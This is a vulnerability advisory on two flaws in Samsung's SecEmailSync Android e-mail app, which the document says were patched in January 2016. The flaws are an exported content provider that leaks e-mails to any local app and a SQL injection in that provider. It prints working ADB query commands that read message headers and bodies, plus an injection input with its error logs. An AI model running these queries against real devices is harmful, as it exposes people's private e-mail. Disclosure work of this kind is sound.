- Authors: Roberto Paleari (@rpaleari) and Aristide Fattori (@joystick)
- Samsung ID: SVE-2015-5081
- ID: CVE-2016-2565 and CVE-2016-2566
- Notification date: 29/10/2015
- Release date: 02/02/2016
We identified some vulnerabilities and insecure settings in
Samsung proprietary e-mail application, SecEmailSync, distributed with recent
Android-based Samsung phones. These vulnerabilities can be exploited by any
local application to access a victim's e-mail messages. The attacker App does
not require any specific privilege, so the attack is quite stealthy.
Recent Samsung Android phones include a proprietary application, named
SecEmailSync (package com.samsung.android.email.sync). This App exposes
multiple services and content providers, some of which are accessible by any
unprivileged local applications.
Among these, we focused on the content provider .homecard.OtherProvider. The
relevant manifest entry follows:
<provider android:authorities="com.samsung.android.email.otherprovider" android:exported="true"
android:name="com.samsung.android.email.sync.homecard.OtherProvider"/>
As can be seen from this snippet, this provider is exported and can thus be queried by any other local application, without requiring any specific privilege (CVE-2016-2565).
We investigated the inner workings of this provider and detected it can be
abused to access e-mail messages handled by Samsung proprietary application
(SecEmail).
As an example, the following ADB command demonstrates how it is possible to
query the content provider to extract the e-mails sent by a given sender (in
this case, bobby@mysite.it):
$ adb shell content query --uri content://com.samsung.android.email.otherprovider/header --where bobby@mysite.it
Row: 0 timeStamp=1446119267000, subject=Test email, _id=1997
URI content://com.samsung.android.email.otherprovider/body also gives access
to the e-mail body:
$ adb shell content query --uri content://com.samsung.android.email.otherprovider/body --where bobby@mysite.it
Row: 0 htmlContent=NULL, textContent=Email body
It is not even required to know the e-mail address of a valid sender, as
passing "@" as the e-mail address would suffice to match all the e-mails
available.
Even worse, the very same content provider is affected by a SQL injection (SQLi) issue (CVE-2016-2566). As an example, the following query triggers the vulnerability:
$ adb shell content query --uri content://com.samsung.android.email.otherprovider/body --where "test@me'"
When this query is processed, the following messages are recorded in the Android logs (logs have been truncated due to space contraints):
E/DatabaseUtils( 5454): android.database.sqlite.SQLiteException: unrecognized token: "') ORDER BY timeStamp COLLATE NOCASE DESC LIMIT 10" (code 1): , while compiling: SELECT timeStamp, subject, _id FROM Message WHERE (fromList like '%test@me'%') ORDER BY timeStamp COLLATE NOCASE DESC LIMIT 10
E/DatabaseUtils( 5454): #################################################################
E/DatabaseUtils( 5454): Error Code : 1 (SQLITE_ERROR)
E/DatabaseUtils( 5454): Caused By : SQL(query) error or missing database.
E/DatabaseUtils( 5454): (unrecognized token: "') ORDER BY timeStamp COLLATE NOCASE DESC LIMIT 10" (code 1): , while compiling: SELECT timeStamp, subject, _id FROM Message WHERE (fromList like '%test@me'%') ORDER BY timeStamp COLLATE NOCASE DESC LIMIT 10)
E/DatabaseUtils( 5454): #################################################################
E/DatabaseUtils( 5454): at android.database.sqlite.SQLiteConnection.nativePrepareStatement(Native Method)
....
E/DatabaseUtils( 5454): at com.samsung.android.email.provider.provider.database.AbsEmailProvider.query(AbsEmailProvider.java:1986)
The SQLi can be obviously exploited to extract arbitrary data from the SQL tables managed by the content provider.
We confirm these issues affect the following device models. Other models and firmware versions are probably affected as well, but they were not tested.
- SM-G920F, build G920FXXU2COH2 (Galaxy S6)
The vulnerabilities discussed in this advisory have already been patched by Samsung, in their January Android Security Update (SMR-JAN-2016).